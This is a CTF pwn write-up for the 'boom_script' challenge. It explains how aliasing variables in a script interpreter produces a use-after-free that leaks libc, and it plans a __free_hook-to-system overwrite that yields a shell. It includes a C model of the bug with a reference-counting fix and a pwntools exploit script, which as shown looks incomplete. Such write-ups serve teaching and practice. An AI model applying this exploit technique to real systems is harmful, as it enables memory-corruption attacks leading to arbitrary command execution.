boom_script
This is a pwn challenge from the Shanghai Donghua Cup, the hardest one there and a type I had not met before. Challenges like this rely on a huge code base that is brutally hard to reverse, but once you understand the essence everything becomes simple: pay close attention to malloc, free, and the dangerous functions that can overflow the stack.
Analysis:
1. Running the program directly shows only two features, run and help.
help tells us which syntax the program can interpret and then run:
printn prints an int value
prints prints a string
inputn reads an int value
2. If you define a variable a = "aaaaaaaaaaaaaaaa";, the program mallocs a heap chunk and stores the data in it. If you then define b with b = a, a and b point to the same chunk. Reassigning a = ""; frees that chunk while b still points to it, so prints(b) leaks.
Put more than 0x400 bytes of 'a' into a, so the malloc size is beyond the tcache range; shrinking a then frees that chunk, and show(b) (i.e. prints(b)) leaks a libc address.
3. Since there is a UAF, there are many ways to attack this, and we can try hitting __free_hook: write system into __free_hook, then create a variable sh = "/bin/sh\x00"; and freeing that chunk gives a shell.
Array writes go to the data at offset 0x28, so there is a misalignment. First take the chunk back with the array allocation, free it again, and then do the UAF exploitation.
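The aliasing bug behind steps 2 and 3, as an added C model that is not the challenge binary's code: a tiny variable store in which `b = a` shares one heap string, with a reference count so that reassigning `a` cannot free a chunk `b` still names. The store layout and the names `assign_lit`, `assign_var`, `reassign_would_dangle` and `scenario` are my own constructions; `reassign_would_dangle` flags where the original pointer-copying design would have freed a shared chunk, without touching freed memory.

```c
#include <stdlib.h>
#include <string.h>

/* Constructed model of the script's variable store (added example, not the
 * challenge binary's code). `b = a` copies a heap pointer, so two names alias
 * one chunk; counting those aliases frees the chunk only when the last name goes. */
#define NVARS 4
#define ORIG "aaaaaaaaaaaaaaaa"   /* the writeup's a = "aaaa..."; */
struct strval { char *buf; int refs; };
struct store { struct strval *v[NVARS]; };

static struct strval *newstr(const char *s) {
    struct strval *p = malloc(sizeof *p);
    p->buf = malloc(strlen(s) + 1); memcpy(p->buf, s, strlen(s) + 1); p->refs = 1;
    return p;
}
/* Drop one reference; release the chunk only when nobody aliases it any more. */
static void release(struct strval *p) {
    if (p && --p->refs == 0) { free(p->buf); free(p); }
}
/* a = "literal": bind the fresh value first, then drop the old reference. */
void assign_lit(struct store *s, int a, const char *lit) {
    struct strval *old = s->v[a];
    s->v[a] = newstr(lit);
    release(old);
}
/* b = a: share the value and count the alias instead of copying a raw pointer. */
void assign_var(struct store *s, int b, int a) {
    if (s->v[a]) s->v[a]->refs++;
    release(s->v[b]);
    s->v[b] = s->v[a];
}
/* The writeup's bug, modelled without touching freed memory: an interpreter that
 * frees on every reassignment leaves the other aliases dangling. Returns 1 when
 * reassigning `a` would do that, i.e. its current value is shared. */
int reassign_would_dangle(const struct store *s, int a) {
    return s->v[a] != NULL && s->v[a]->refs > 1;
}
/* Replays a = "aaaa..."; b = a; a = "aaaaaa"; prints(b) from the writeup.
 * Bit 0: b still reads the original string under the counted-alias fix.
 * Bit 1: the raw pointer-copy behaviour would have freed b's chunk (the UAF). */
int scenario(void) {
    struct store s = {{0}}; int result = 0;
    assign_lit(&s, 0, ORIG);                            /* a = "aaaa..."; */
    assign_var(&s, 1, 0);                               /* b = a; */
    if (reassign_would_dangle(&s, 0)) result |= 2;
    assign_lit(&s, 0, "aaaaaa");                        /* a = "aaaaaa"; */
    if (!strcmp(s.v[1]->buf, ORIG) && s.v[1]->refs == 1) result |= 1;
    release(s.v[0]); release(s.v[1]);                   /* last references: freed only now */
    return result;
}
```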
exp
from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
libc = ELF("./libc.so.6")

p = process("./boom_script")
bss = 0x76100
p.sendlineafter("$", '1')   # pick menu option 1 at the "$" prompt
code = ''' a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; b = a; a = "aaaaaa"; prints(b); c=0; array arr[20]; arr[0] = 1; b="bbbbbb" a1="cccccccccccccccccccccccccccccccccccccccccccccccccccccccc";
tc1 = "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee"; sss = "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee"; aaa = "/bin/sh"; tc1 = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; sss = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"; prints("eeee"); inputn(c); arr[0] = c; arr[1] = c;
'''
gdb.attach(p)
p.sendlineafter("length:", str(len(code) + 1))
p.sendlineafter("code:", code)

# prints(b) leaks a libc pointer whose top byte is 0x7f; bytes literals so the
# slicing and ljust also run under Python 3 pwntools
libc_base = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 0x1ebbe0
success("libc_base:" + hex(libc_base))

pause()
# c = address of __free_hook; the script stores it into arr[0] and arr[1]
p.sendlineafter("eeee", str(libc_base + libc.sym["__free_hook"]))
pause()
p.interactive()